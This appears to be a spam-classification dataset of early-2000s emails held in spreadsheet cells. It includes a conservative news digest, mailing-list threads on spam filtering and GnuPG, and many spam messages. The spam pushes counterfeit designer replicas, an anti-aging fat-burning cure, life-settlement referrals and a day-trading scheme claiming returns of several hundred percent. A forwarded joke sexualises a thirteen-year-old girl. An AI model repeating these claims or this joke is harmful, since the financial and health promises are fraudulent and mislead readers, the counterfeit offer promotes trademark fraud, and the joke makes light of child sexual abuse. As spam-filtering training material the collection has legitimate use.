 revealing Washington=92s Week piece http://insightmag.com/news/258785.htm=
 l.=20
 And Zoli Simon has discovered that the Chinese have targeted Russian crui=
 se=20
 missiles at U.S. ships. Read all about it=20
 http://insightmag.com/news/258778.html. And guess which party is poised t=
 o=20
 become a major force in time for the November elections? Hint =96 It=92s =
 not the=20
 Republicans or Democrats http://insightmag.com/news/258781.html. Along wi=
 th the=20
 usual reliable revelations and opinions described below. =91Bye for now. =
 &gt;&gt;From the=20
 Bunker, I remain your newsman in Washington.
 ...............................................
 CHINA ARMS FOR WAR
 Zoli Simon writes that China's acquisition of cruise-missile weapons syst=
 ems=20
 from Russia poses a clear and present danger to U.S. naval forces =96 and=
  to the=20
 American homeland as well.
 http://insightmag.com/news/258778.html
 ...............................................
 WASHINGTON=92S WEEK =96 ON THE LEGISLATIVE WARPATH
 Jennifer Hickey tells us as investor anger registered more clearly with e=
 ach=20
 downward tick of the stock markets, legislators engaged in an indelicate=20
 parliamentary exchange of whoops about arcane congressional rules while t=
 hey=20
 danced and ululated to mutual charges of chicanery.
 http://insightmag.com/news/258785.html
 ...............................................
 TAX CODE TRAUMA
 John Berlau tells us that experts contend that simplifying the U.S. tax c=
 ode=20
 would do more to cut down on corporate-accounting chicanery than the=20
 introduction of still more regulations and criminal penalties.
 http://insightmag.com/news/258763.html
  =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
                Is Bin-Laden the Pawn of China?
 On September 11, 2001, a Chinese Peoples Liberation Army transport aircra=
 ft from=20
 Beijing landed in Kabul with the most important delegation the ruling Tal=
 iban=20
 had ever received.  They had come to sign the contract with Afghanistan t=
 hat=20
 Osama bin-Laden had asked for, that would provide the Taliban state of th=
 e art=20
 air defense systems in exchange for the Taliban's promise to end the atta=
 cks by=20
 Muslim extremists in China's north-western regions.  Hours later, CIA Dir=
 ector=20
 George Tenet received a coded "red alert" message from Mossad's Tel Aviv=20
 headquarters that presented what he called a "worst case scenario" -- tha=
 t China=20
 would use a ruthless surrogate, bin-Laden, to attack the United States.  =
 In=20
 SEEDS OF FIRE, Gordon Thomas asks the question: In the war on terror, is =
 China=20
 with us or against us?  Click here:=20
 http://www.conservativebookservice.com/BookPage.asp?prod_cd=3DC5969&amp;sour_=
 cd=3DINT003901
  =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 AUSTRIA CONFRONTS ITS DARK NAZI PAST
 Ken Timmerman writes that as a government commission prepares to release =
 an=20
 inventory of property stolen from Jews by the Nazis, a new tide of anti-S=
 emitism=20
 is sweeping the country.
 http://insightmag.com/news/258764.html
 ...............................................
 =91PARTY OF PRINCIPLE=92 GAINING GROUND
 Doreen Englert says, once an afterthought on the U.S. political landscape=
 , the=20
 Libertarian Party steadily has increased both in numbers and influence si=
 nce its=20
 founding 30 years ago.
 http://insightmag.com/news/258781.html
 ...............................................
 CHURCH EXPLORES =91HARD CHANGE=92
 Jennifer Hickey writes that seeking to repair its severely damaged reputa=
 tion=20
 and begin the healing process, the Catholic Church takes steps to impleme=
 nt a=20
 nationwide policy on sexual abuse.
 http://insightmag.com/news/258761.html
 You have received this newsletter because you have a user name and passwo=
 rd at=20
 Insight on the News.
 To unsubscribe from this newsletter, visit=20
 "http://insightmag.com/main.cfm?include=3Dunsubscribe". You may also log =
 into=20
 Insight on the News and edit your account preferences on the Web.
 If you have forgotten or don't know your user name and password, it will =
 be=20
 emailed to you after visiting the following link:
 http://insightmag.com/main.cfm?include=3DemailPassword&amp;serialNumber=3D16o=
 ai891z5&amp;email=3Dcypherpunks@ssz.com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</si>
  <si>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Google? Not in China
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "J" == Jim Whitehead &lt;ejw@CSE.UCSC.EDU&gt; writes:
     J&gt; Seems that governments do have some power over the
     J&gt; Web, after all.
 At the 1993 ITAC "Roadwork" Conference, Peter Mansbridge asked the
 panel of experts how it might be possible to censor the internet.  All
 of the panelists laughed except Bill Buxton.  Peter asked him if he
 knew something the others didn't.  Bill replied that it /was/ possible
 to censor the internet, which drew a gasp from the audience. "All you
 need is a global government more Draconian than any that has occured
 before in history"
 Scientology DMCA suits against Norwegians, legal RIAA file-trading
 virii, Bush's Homeland Insecurity, Canada using ISPs as spies, RIAA
 suing Prodigy for P2P users and having Foreign sites barred from the
 US, France tempers Yahoo, China IP-filters Google ... 
 Seems Bill didn't know much about how Government really works.  Either
 that, or there's a smelly similarity between Buxton's global Big
 Brother and the US and Chinese.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Labels shoot selves in foot by focusing on stopping P2P
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85490404
 Date: Not supplied
 A new KPMG study concludes that the RIAA and its member companies are hurting 
 themselves by focusing on cracking down on P2P sharing instead of figuring out 
 ways to earn a living with it. 
     Media companies must put less emphasis on protecting digital content and 
     instead find ways to make money from digital music and movies if they hope 
     to beat back copyright pirates who threaten their businesses, according to 
     a study released on Wednesday from KPMG... 
     "They complain about the Napsters," she said, referring to the bankrupt 
     music swap site that was found to violate U.S. copyright laws. "But why do 
     the Napsters exist, because the marketplace wants them." 
     Steel said that if the issue "is not on boardroom table ... then that 
     boardroom has problems."  
 Link[1] Discuss[2] (_Thanks, Michael!_)
 [1] http://story.news.yahoo.com/news?tmpl=story&amp;ncid=581&amp;e=3&amp;cid=581&amp;u=/nm/20020925/tc_nm/media_kpmg_dc
 [2] http://www.quicktopic.com/boing/H/cyfuTEBbTuVRG
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAdev] Re: [Razor-users] Mutating spam
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin Mason wrote:
 &gt;&gt; Interestingly, some of these seem (apparently) to be encrypted versions of
 &gt;&gt; the recipient email address.  To see this, ROT13 yr address and grep your
 &gt;&gt; spam archive.  There'll be at least 1 hit.
 Theo Van Dinter &lt;felicity@kluge.net&gt; writes:
 &gt; Hmmm.  I'm surprised at these results, especially since I should be
 &gt; seeing some false positives...  Not a lot of matches though. :(
 Still worthwhile -- 1.257% is not that bad.  :-)
 My results:
   OVERALL%   SPAM% NONSPAM%     S/O    RANK   SCORE  NAME
     11774     4079     7695    0.35    0.00    0.00  (all messages)
   100.000   34.644   65.356    0.35    0.00    0.00  (all messages as %)
     0.195    0.564    0.000    1.00    0.75    1.00  T_ROT13_EMAIL_3
     0.161    0.466    0.000    1.00    0.73    1.00  T_ROT13_EMAIL_2
     0.161    0.466    0.000    1.00    0.73    1.00  T_ROT13_EMAIL
 The interesting thing is that these hits all seem to be rot13 versions
 of the To: address.  If we ever start getting FPs (or if anyone is
 worried), we could make it an eval test for rot13 of the To: address
 (turning non-word characters into "." characters in the regular
 expression).
 At the same time, it might be worth testing for username in HTML
 comments.  I found some &lt;!--quinlan--&gt; types in HTML comments, but I
 haven't seen enough hits so far to bother (however, I did add a really
 good test for email addresses in comments).
 Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 On Sun, 01 Sep 2002 00:05:03 MDT Reg Clemens wrote: 
 [...]
 &gt; in messages with GnuPG signatures.  But punching the line ALWAYS
 &gt; gives
 &gt; 
 &gt;         Signature made Thu Aug 29 00:27:17 2002 MDT using DSA key ID BDDF997A
 &gt;         Can't check signature: public key not found
 &gt; 
 &gt; So, something else is missing.
 Yes, the public key of the signature you want to check :-).
 Are you really sure that you have the public key of the message's
 signature? If not, try downloading it or try to check a signature from
 which you know you have the public key.
 Regards,
 Ingo
 -- 
 Ingo Frommholz                             PGP public keys on homepage
 ingo@frommholz.org                           http://www.frommholz.org/
 My childhood inspection is my record collection (Ned's Atomic Dustbin)
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 22, 2002 at 10:58:34PM +0200, Robert Harley wrote:
 &gt; An apparent quote from Dubya, from the Times (sent to me by my Dad):
 &gt; 
 &gt; http://www.timesonline.co.uk/printFriendly/0,,1-43-351083,00.html
 http://www.snopes.com/quotes/bush.htm
 Claim:   President George W. Bush proclaimed, "The problem with
 the French is that they don't have a word for entrepreneur."
 Origins:   Yet another French fried "George W. Bush is dumb"
 story has been taken up by those who like their caricatures
 drawn in stark, bold lines. According to scuttlebutt that
 emerged in the British press in July 2002, President Bush,
 Britain's Prime Minister Tony Blair, and France's President
 Jacques Chirac were discussing economics and, in particular,
 the decline of the French economy. "The problem with the
 French," Bush afterwards confided in Blair, "is that they don't
 have a word for entrepreneur."
 The source was Shirley Williams, also known as the Baroness
 Williams of Crosby, who claimed "my good friend Tony Blair" had
 recently regaled her with this anecdote in Brighton.
 Lloyd Grove of The Washington Post was unable to reach Baroness
 Williams to gain her confirmation of the tale, but he did
 receive a call from Alastair Campbell, Blair's director of
 communications and strategy. "I can tell you that the prime
 minister never heard George Bush say that, and he certainly
 never told Shirley Williams that President Bush did say it,"
 Campbell told The Post. "If she put this in a speech, it must
 have been a joke."
 This is far from the first time Bush has been made the butt of
 a jibe meant to showcase what some perceive as his less than
 stellar intellectual abilities. Without straining our memories
 too hard, we can come up with three other instances we've
 chronicled on this site. In the summer of 2001, the joke of the
 moment centered upon a supposed study that had resulted in the
 ranking of Presidential IQs, with George W. Bush being pegged
 as the Chief Executive who scraped the bottom of the
 intelligence barrel. In December 2000 it was a fake Nostradamus
 quatrain which pontificated that the "village idiot" would win
 the 2000 Presidential election. And in the spring of 2002, it
 was the story of Bush's waving at Stevie Wonder that set folks
 to chortling up their sleeves.
 Stories that illustrate this widely believed intellectual
 shortcoming will always waft after George W. Bush because they
 seemingly confirm what many already hold as true about this
 public figure, that he's not the brightest fellow that's ever
 been. It is human nature to revel in yarns that the hearer at
 some level agrees with, thus tales of this sort will always
 fall upon appreciative ears.
 Barbara "ears of corn" Mikkelson
 Last updated:   29 July 2002
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Unique Dual Income Opportunity
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_16A521_01C1E6FA.2DA9A6B0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Life Insurance Settlements: A unique dual-income opportunity
  =09
 A Life Settlement is the sale of a life insurance policy=20
 that gives the policy owner a significant cash settlement. =09
  =09
  Earn substantial referral fees=0A=
 Sell more product=0A=
 Renewal Commissions of
 Original Policy Stay Intact=0A=
 A Value-Add to Your Existing Business=09
 DON'T CHANGE YOUR CURRENT WAY OF DOING BUSINESS
 Turn your existing book into an additional income stream=20
 with very little effort. =09
  =09
 Please fill out the form below for more information	=20
 Name:	  =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  	 =09
  	  	 	   =09
 =20
 Call or e-mail &lt;mailto:info@vbimail.com&gt;  us today!
  800-871-9440
 or visit us online at: www.Life-Settlements-Online.com
 &lt;http://www.life-settlements-online.com&gt;=20
  =20
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.Insurancemail.net
 &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 =20
 ------=_NextPart_000_16A521_01C1E6FA.2DA9A6B0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;A Unique Dual Income Opportunity&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"2" =
 bgcolor=3D"#000000" align=3D"center"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;img src=3D"http://63.211.81.87/images/vbi/20020411-1e.jpg" =
 width=3D"550" height=3D"361" alt=3D"Life Insurance Settlements: A unique =
 dual-income opportunity"&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/vbi/spacer.gif" =
 width=3D"2" height=3D"2"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font size=3D"2" face=3D"Verdana, Arial, Helvetica, =
 sans-serif"&gt;
             A &lt;font color=3D"#000066"&gt;&lt;b&gt;Life Settlement&lt;/b&gt;&lt;/font&gt; is =
 the sale of a life insurance policy &lt;br&gt;
             that gives the policy owner a significant cash =
 settlement.&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/vbi/spacer.gif" =
 width=3D"2" height=3D"2"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/vbi/20020410-3.gif" width=3D"455" =
 height=3D"100" alt=3D"Earn substantial referral fees&amp;#10;Sell more =
 product&amp;#10;Renewal Commissions of Original Policy Stay Intact&amp;#10;A =
 Value-Add to Your Existing Business"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;
             &lt;b&gt;&lt;font color=3D"#000066"&gt;DON'T CHANGE YOUR CURRENT WAY OF =
 DOING BUSINESS&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             Turn your existing book into an &lt;b&gt;additional income =
 stream&lt;/b&gt; &lt;br&gt;
             with very little effort.&lt;/font&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://63.211.81.87/images/vbi/spacer.gif" =
 width=3D"1" height=3D"8"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;=20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face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#FFFFFF"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"4"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;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value=3D"info@vbimail.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"InsuranceIQ Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &amp;nbsp;&lt;br&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;&lt;b&gt;Call or &lt;a href=3D"mailto:info@vbimail.com"&gt;e-mail&lt;/a&gt; us =
 today!&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;img src=3D"http://63.211.81.87/images/vbi/20020410-4.gif" =
 width=3D"540" height=3D"67" alt=3D"800-871-9440"&gt;&lt;b&gt;&lt;br&gt;
             or visit us online at: &lt;a =
 href=3D"http://www.life-settlements-online.com"&gt;www.Life-Settlements-Onli=
 ne.com&lt;/a&gt;&lt;br&gt;
             &amp;nbsp; &lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt; We =
 don't want anybody=20
         to receive our mailings who does not wish to receive them. This =
 is professional=20
         communication sent to insurance professionals. To be removed =
 from this=20
         mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go =
 here: &lt;a href=3D"http://www.Insurancemail.net"&gt;=20
         http://www.Insurancemail.net&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal=20
   Notice&lt;/a&gt; &lt;/font&gt;=20
 &lt;/center&gt;
 &lt;img height=3D'1' width=3D'1' border=3D'0' src=3D'304704'&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_16A521_01C1E6FA.2DA9A6B0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Best Replica Goods - Best Prices
</t>
  </si>
  <si>
    <t xml:space="preserve">*** FREE BONUS OFFER - SEE BELOW ***
 We can supply TOP QUALITY, VIRTUALLY IDENTICAL REPLICAS of just about anything - from watches to wallets, from lighters to lingerie, clothing, accessories, even electrical goods. All your favorite designer labels reproduced at a fraction of the price.
 All major Credit Cards accepted. Worldwide certified shipping. Quality guaranteed.
 We are currently building our catalog so let us know that you want to receive notification when our on-line catalog is published later this month to qualify for a GREAT FREE BONUS OFFER.
 *** FREE BONUS: Register NOW for our catalog and receive one pair of designer REPLICA sunglasses (our regular price $15) &amp; check out the quality of our goods FREE OF CHARGE ***
 For more information email: replicas@fastnetspain.net
 Register NOW to be sure you don't miss out !!!
 To remove from future mailings email: noreplicas@fastnetspain.net
 Register NOW to be sure you don't miss out !!!
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-10-03
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 Mailing List Judo movie available
     posted by gnat on Wednesday October 02, @12:47 (news)
     http://use.perl.org/article.pl?sid=02/10/02/1647249
 Conference Presentation Judo movie available
     posted by gnat on Wednesday October 02, @18:56 (news)
     http://use.perl.org/article.pl?sid=02/10/02/2257211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</si>
  <si>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LazyTraders; LDT 342%, Chatroom $455,000, AI Stockpicks 348% this week.
</t>
  </si>
  <si>
    <t xml:space="preserve">LazyTraders,
 Even when the Market takes a 300 odd point dive you can still make money
 in the Stock Market if you know what you are doing.
 If you don't know what you are doing follow people who do.
 This week You could have made:
 Up to 392% using The Lazy DayTrader System.
 One Stock that you would have found immediately was a stock that was
 trading at .55, until a large company announced that it was offering $1.10
 for the shares.
 What do you think happened to the value of the Shares?
 Within the same day they went up to $1.10. 100% profit in one day!
 There were 3 more examples like it this week which you would have found
 within 5 seconds with the Lazy DayTrader System.
 Learn how to do this at:
 http://lazytrader.get.to
 Our Chatroom this week made $455,000 trading 1000 shares with no losing
 days.
 If you want to learn about Fibonacci Numbers and Elliott Waves join the
 Chatroom for $199 per month and watch Mr G for a while before trading with
 him to learn his methods.
 Some comments from Friday's Chatroom:
 "bones&gt; G and Chat, good job as usual.  You helped me make 2400.00 in closed trades the past 2 days just trading 2    and 3 lots.
 &lt;kauaiboy&gt; ditto that I'm 2350 in 4 days only using 3 lot. Thanks G, you two guys are the greatest.
 &lt;king&gt; Deepest thanks to you, G &amp; C,  my numbers are great for the month and week.  Up 2000 + on week, $8000 + on month.  Never happened for me before!
 &lt;fenney&gt; thanks G, it's your doing, I just tag along. I'm up 25 points today!"
 If you want to use StockPicking Software to tell you when there is a buy
 and when to sell, subscribe to our AI Picks for $299 per month.
 Our AI Picks produced 39.8% average profit every day this week.
 It produces both long and shorting opportunities. 
 You can start trading with as little as $500 from 8 AM EST until 8 PM EST.
 Have a nice day.
 Frank vanderlugt
 http://lazytrader.get.to
 If our server is down go to any Search Engine and type "lazy daytrader"
 To be removed just send an email to:
 lazytrader@ultimateemail.com
 Or fax us at:
 808-575-7312
 Please understand that the decision to buy or sell any
 security is done purely at your own risk. Under no
 circumstances will we, owners, officers,
 or employees be held liable for any losses incurred by
 the use of information contained in the Lazy DayTrading
 System. Please recognize that investing in stocks includes
 risk and that the past performance of a stock is not
 necessarily an indicator of future gains. The person or
 persons utilizing this service herein known as
 "subscriber" acknowledges that he/she fully understands
 that the risk factor is high in trading and that only
 "Risk Capital" or "Risk Funds" should be used in such
 trading. A person who does not have extra Risk Capital,
 or Risk Funds, that they can afford to lose, should not
 trade in the market. No "SAFE" trading system has ever
 been devised, and no one including us can guarantee
 profits or freedom from loss. We are not brokers or
 stock advisors.
 Please understand that the information provided in The
 Lazy DayTrading System is for educational purposes only
 and that we are not recommending any securities to
 be bought or sold.
 The information provided by The
 Lazy DayTrading System is for the personal use of the
 members only.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Hitler-style applicant welcomed by parties
</t>
  </si>
  <si>
    <t xml:space="preserve">The Times
  September 06, 2002
  Hitler-style applicant welcomed by parties
  By Roger Boyes
  MANAGERS of Germanys political parties are having difficulty explaining their
  enthusiastic reaction to a man who applied for membership with letters cribbed
  largely from Mein Kampf, Hitlers personal manifesto. The incident illustrates
  how indiscriminate parties have become in taking on new members during an
  election campaign, even when their sentiments bear a suspicious resemblance to
  those of the Fhrer. 
  Edmund Stoiber is a thousand times more suited to leading Germany than the
  present Chancellor, said one letter sent to the Christian Social Union
  headquarters in Ingolstadt. Chancellor Schrder is doing nothing to stop the
  flood of foreigners who are spreading around our Fatherland, said the letter,
  signed by a certain Rudolph Lewald. 
  The CSU immediately spotted a potential member. Many thanks for your nice
  thoughts, replied the local party manager, who enclosed an application for
  membership. 
  The letter used chunks of Hitlers book, which is still banned in Germany.
  History students have to apply for access to the book in university libraries.
  The strongest, the brave and the hardworking will receive the birthright of
  existence, only those who are born weaklings could regard this as offensive,
  the letter-writer said. So-called humanity is melting like snow in the March
  sun. Such phrases were lifted from Mein Kampf, which was written while Hitler
  was in jail after the failed Munich putsch of 1923. 
  Similar letters, also using the Nazi leaders words, were sent to the other
  political parties and drew sympathetic responses. I read your letter with
  great interest and pleasure, the manager of the Christian Democratic Union in
  Cologne, said. 
  Great that you want to join us! enthused the Green Party headquarters. The
  Free Democrats invited the aspiring party member to a fundraising charity ball
  at which Hans- Dietrich Genscher, the former Foreign Minister, would be the
  star guest. The Social Democrats sent a list of rallies to be attended by
  Gerhard Schrder, the Chancellor. 
  I wanted to test how serious parties are about combating right-wing
  extremism, said the letter-writer, who was in fact the Cologne novelist
  Rainer Popp. I had no idea that they would be so enthusiastic. 
  For the first few days I expected two men in leather coats from the Special
  Branch to knock on my door. Instead only the postman called  with packets of
  election material from zealous political headquarters, Herr Popp said. 
  I was stunned that political parties could react in this way  I reckon I
  would have had the same response if I had signed the letter Adolf Hitler.
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A youthful and slim summer in 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">As seen on NBC, CBS, CNN, and even Oprah! The health 
 discovery that actually reverses aging while burning fat, 
 without dieting or exercise! This proven discovery has even 
 been reported on by the New England Journal of Medicine. 
 Forget  aging and dieting forever! And it's Guaranteed!   
 Click here:
 http://www205.wiildaccess.com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
 You are receiving this email as a subscriber
 to the Opt-In America Mailing List. 
 To unsubscribe from future offers,
 just click here:
 mailto:affiliateoptout@btamail.net.cn?Subject=off
</t>
  </si>
  <si>
    <t xml:space="preserve">You might be better asking this on the spamassassin-talk list.  The folks 
 there will almost definitely have an answer for this.
 On Thu, 5 Sep 2002, David Rees wrote:
 &gt; This is my first time running Razor, heard a lot of good things about it so
 &gt; I thought I'd give it a shot.  I also run SpamAssassin so I'd like to
 &gt; integrate the two.
 &gt; 
 &gt; I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd
 &gt; shoot the message here first
 &gt; 
 &gt; With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these
 &gt; messages spit out from spamd:
 &gt; 
 &gt; razor2 check skipped: No such file or directory Can't call method "log" on
 &gt; unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm
 &gt; line 211, &lt;STDIN&gt; line 75.
 &gt; 
 &gt; Any ideas?  razor seems to run correctly over the command line.
 &gt; 
 &gt; Thanks,
 &gt; -Dave
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by: OSDN - Tired of that same old
 &gt; cell phone?  Get a new here for FREE!
 &gt; https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt;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</si>
  <si>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Say, how old are you, anyway?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Nev Dull &lt;nev@sleepycat.com&gt;
 A guy struck up a conversation with a young lady in a bar.  After a half
 dozen drinks, he suggested they get their own bottle and retire to his
 motel room, and she readily agreed. "Say, how old are you, anyway?" the
 guy asked.
     "Thirteen," she replied with a shy smile. 
     "Thirteen?   Thirteen!?  My God, Girl!  Get your clothes back on at
 once and get the hell out of here!  Are you crazy?" he thundered.
     Pausing at the door as she left, the girl smiled.  "Superstitious,
 huh?"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A Free Sample and Tape for You dwgxb
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Roth conversions = jumbo annuity sale
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_268694_01C20276.CCE3E8C0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  What good is a great concept (Roth conversion) without a turnkey system
 to sell it?	
 Introducing the Roth Conversion turnkey selling system
 Our top producing roth conversion agent (sold 10 jumbo annuities, 200k
 sales with 14%+ commissions) has shared with us his secrets of selling
 the roth conversion concept. Per his input, we have created the roth
 conversion "turnkey sales process".
 The system includes client postcards, client brochures, a client
 worksheet (perfect for introducing the roth conversion program), a full
 marketing presentation, etc. If he can do it, so can you!
 To join us for the brand new "sales presentation" teleconference, call
 in Monday, Wednesday or Friday at 12:00 noon Pacific/3 p.m. Eastern at:
  702-579-4902
 To find out more about the content of the call complete the form below
 and you will be immediately directed to the "conference call" page. 
 First Name:	  	 	
 Last Name:	  	Note that when you press the "Send Information"
 button the screen may not change, but we will still receive your
 information and get back to you. Another way to order our sample
 presentation is to visit our website at www.gsladvisory.com/froco
 &lt;http://www.gsladvisory.com/froco&gt; .	 
 E-Mail:	  	
 Phone#:	  	
  GSL Advisory
 These materials are for "agent use only". You should be a practicing,
 licensed and appointed annuity agent to order this information.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------=_NextPart_000_268694_01C20276.CCE3E8C0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
